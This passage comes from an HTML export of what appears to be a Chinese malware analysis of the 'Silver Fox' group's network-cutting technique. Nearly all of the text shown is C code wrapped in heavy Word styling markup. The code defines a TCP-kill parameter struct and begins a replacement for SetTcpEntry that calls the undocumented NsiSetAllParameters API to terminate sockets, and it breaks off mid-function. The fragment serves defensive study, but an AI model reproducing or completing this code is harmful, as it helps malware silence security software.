Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">0x77, </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;BaseNTok&#39;;color: #40A070;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">0x59, </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;BaseNTok&#39;;color: #40A070;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">0xBC</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">};</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;CommentTok&#39;;color: #60A0B0;font-style: italic;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">// Structure expected by NsiSetAllParameters to represent a TCP socket</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;KeywordTok&#39;;color: #007020;font-weight: bold;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">struct</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf=""> TcpKillParamsIPv4 </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">{</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span><span leaf="">WORD</span><span style="mso-spacerun:yes;"><span leaf="">  </span></span><span leaf="">localAddrFamily</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span><span leaf="">WORD</span><span style="mso-spacerun:yes;"><span leaf="">  </span></span><span leaf="">localPort</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span><span leaf="">DWORD localAddr</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span><span leaf="">BYTE</span><span style="mso-spacerun:yes;"><span leaf="">  </span></span><span leaf="">reserved1</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">[</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;DecValTok&#39;;color: #40A070;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">20</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">];</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span><span leaf="">WORD</span><span style="mso-spacerun:yes;"><span leaf="">  </span></span><span leaf="">remoteAddrFamily</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span><span leaf="">WORD</span><span style="mso-spacerun:yes;"><span leaf="">  </span></span><span leaf="">remotePort</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span><span leaf="">DWORD remoteAddr</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span><span leaf="">BYTE</span><span style="mso-spacerun:yes;"><span leaf="">  </span></span><span leaf="">reserved2</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">[</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;DecValTok&#39;;color: #40A070;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">20</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">];</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">};</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;CommentTok&#39;;color: #60A0B0;font-style: italic;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">// Custom replacement for SetTcpEntry using undocumented NSI API</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">DWORD MySetTcpEntry</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">(</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">MIB_TCPROW_OWNER_PID</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">*</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf=""> pTcpRow</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">)</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">{</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;CommentTok&#39;;color: #60A0B0;font-style: italic;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">// Prepare input data for socket termination</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span><span leaf="">TcpKillParamsIPv4 params </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">=</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">{</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;DecValTok&#39;;color: #40A070;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">0</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">};</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span><span leaf="">params</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">.</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">localAddrFamily </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">=</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf=""> AF_INET</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span><span leaf="">params</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">.</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">localPort </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">=</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">(</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">WORD</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">)</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">pTcpRow</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">-&gt;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">dwLocalPort</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span><span leaf="">params</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">.</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">localAddr </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">=</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf=""> pTcpRow</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">-&gt;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">dwLocalAddr</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span><span leaf="">params</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: 